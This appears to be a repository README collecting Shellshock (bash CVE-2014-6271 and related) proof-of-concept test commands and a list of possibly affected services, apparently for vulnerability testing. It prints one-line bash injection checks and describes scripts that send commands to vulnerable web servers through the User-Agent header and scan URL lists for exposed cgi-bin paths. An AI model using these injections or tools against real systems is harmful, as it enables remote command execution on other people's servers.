/shellshocker-pocs

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Primary LanguagePythonMIT LicenseMIT

Shellshocker - Repository of "Shellshock" Proof of Concept Code

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Please submit a pull request if you have more links or other resources

Speculation:(Non-confirmed possibly vulnerable)

If you know of PoCs for any of these, please submit an issue or pull request with a link.

Command Line (Linux, OSX, and Windows via Cygwin)

  • bashcheck - script to test for the latest vulns

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

CVE-2014-6277

will segfault if vulnerable

IBM z/OS -

HTTP

Phusion Passenger

DHCP

SSH

OSX

OSX - with reverse DNS (CVE-2014-3671.txt)

SIP

Qmail

Postfix

FTP

OpenVPN

Oracle

TMNT

Hand

user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |

CUPS

IRC

Scripts from @primalsec

  • shell_shocker.py - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)
  • w3af_shocker.py - Automates the process of running a w3af spider/shell_shock scan (User-Agent Method)
  • shell_sprayer.py - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)